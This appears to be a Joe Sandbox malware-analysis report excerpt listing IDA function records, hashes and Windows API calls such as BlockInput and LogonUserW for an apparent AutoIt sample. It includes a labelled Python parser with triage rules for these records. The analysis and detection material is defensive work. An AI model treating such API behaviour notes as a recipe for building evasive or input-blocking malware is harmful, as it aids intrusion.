• Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
• Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
• Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
• Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID:
• String ID: 0vH$HH
• API String ID: 0-728391547
• Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
• Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
• Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
• Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
APIs
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: _memset
• String ID:
• API String ID: 2102423945-0
• Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
• Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
• Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
• Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
APIs
• DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Proc
• String ID:
• API String ID: 2346855178-0
• Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
• Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
• Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • BlockInput.USER32(00000001), ref: 0045A272
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: BlockInput
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: LogonUser
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1244722697-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
APIs
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
• Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
• Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
• Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
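Added example, not part of the Joe Sandbox report: a small Python parser for the function records in the layout shown above (an "APIs" header, the resolved call lines with their ref addresses, and the "Similarity" fields such as API ID and Opcode Fuzzy Hash), followed by a few triage rules of my own for the calls seen in this section. The rules are assumptions for illustration, not Joe Sandbox signatures: BlockInput with a non-zero first argument is BlockInput(TRUE), which stops keyboard and mouse input reaching applications; LogonUserW validates a username/password pair; SetUnhandledExceptionFilter installs a top-level exception filter, which is normal CRT start-up code but is also a well-known anti-debugging trick, so it is flagged as "needs a look" rather than as malicious. The sample text is constructed from the records on this page, trimmed to the lines the parser uses.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in the Joe Sandbox function-record layout (trimmed copy of
# the records on this page; the third record lists no resolved API call).
SAMPLE = """\
APIs
• BlockInput.USER32(00000001), ref: 0045A272
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: BlockInput
• Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
APIs
• LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
Memory Dump Source
Similarity
• API ID: LogonUser
• Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
APIs
Memory Dump Source
Similarity
• API ID: NameUser
• Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
Memory Dump Source
"""

# "• Api.MODULE(arg,arg,...), ref: ADDRESS"
API_LINE = re.compile(
    r"^• (?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]{8})$"
)
# "• Key: value" lines under the Similarity header that are worth keeping
FIELD_LINE = re.compile(
    r"^• (?P<key>API ID|API String ID|String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash): ?(?P<val>.*)$"
)


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)   # (api, module, [args], ref)
    fields: dict = field(default_factory=dict)  # Similarity key -> value


def parse_records(text):
    """Split report text into one FunctionRecord per 'APIs' header."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append((m["api"], m["module"], args, m["ref"].upper()))
            continue
        m = FIELD_LINE.match(line)
        if m:
            cur.fields[m["key"]] = m["val"]
    return records


def _nonzero_hex(arg):
    """True only for a resolved, non-zero hex argument ('?' means unresolved)."""
    return bool(re.fullmatch(r"[0-9A-Fa-f]+", arg)) and int(arg, 16) != 0


# Hypothetical triage rules (my own): api name -> (predicate over args, note)
TRIAGE_RULES = {
    "BlockInput": (lambda a: bool(a) and _nonzero_hex(a[0]),
                   "BlockInput(TRUE): blocks keyboard/mouse input to applications"),
    "LogonUserW": (lambda a: True,
                   "LogonUserW: validates a username/password against SAM or domain"),
    "SetUnhandledExceptionFilter": (lambda a: True,
                   "top-level exception filter installed: CRT init or anti-debug, review"),
}


def triage(records):
    """Return one finding per call that matches a triage rule."""
    findings = []
    for idx, rec in enumerate(records):
        for api, module, args, ref in rec.calls:
            rule = TRIAGE_RULES.get(api)
            if rule and rule[0](args):
                findings.append({"record": idx, "api": api, "module": module,
                                 "ref": ref, "note": rule[1],
                                 "opcode_hash": rec.fields.get("Opcode Fuzzy Hash")})
    return findings


def records_without_calls(records):
    """Indexes of records whose 'APIs' header lists no resolved call."""
    return [i for i, r in enumerate(records) if not r.calls]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for f in triage(recs):
        print(f"{f['ref']} {f['module']}!{f['api']}: {f['note']} (opcode {f['opcode_hash']})")
    print("records with no resolved call:", records_without_calls(recs))
```

The opcode fuzzy hash is carried along with each finding so a hit can be pivoted on across other samples in the same report family; records that list no resolved call (like the NameUser record above) are reported separately rather than silently dropped.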
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
• Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
• Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
• Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
• Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
• Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
• Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
APIs
• DeleteObject.GDI32(?), ref: 004593D7
• DeleteObject.GDI32(?), ref: 004593F1
• DestroyWindow.USER32(?), ref: 00459407
• GetDesktopWindow.USER32 ref: 0045942A
• GetWindowRect.USER32(00000000), ref: 00459431
• SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
• AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
• CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
• GetClientRect.USER32(00000000,?), ref: 004595C8
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
• CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
• GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
• GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
• GlobalLock.KERNEL32(00000000), ref: 00459668
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
• GlobalUnlock.KERNEL32(00000000), ref: 0045967F
• CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
• GlobalFree.KERNEL32(00000000), ref: 004596C0
• CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
• SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
• ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
• CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
• GetStockObject.GDI32(00000011), ref: 004597B7
• SelectObject.GDI32(00000000,00000000), ref: 004597BF
• GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
• DeleteDC.GDI32(00000000), ref: 004597E1
• _wcslen.LIBCMT ref: 00459800
• _wcscpy.LIBCMT ref: 0045981F
• CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
• GetDC.USER32(?), ref: 004598DE
• SelectObject.GDI32(00000000,?), ref: 004598EE
• SelectObject.GDI32(00000000,?), ref: 00459919
• ReleaseDC.USER32(?,00000000), ref: 00459925
• MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
• ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4040870279-2373415609
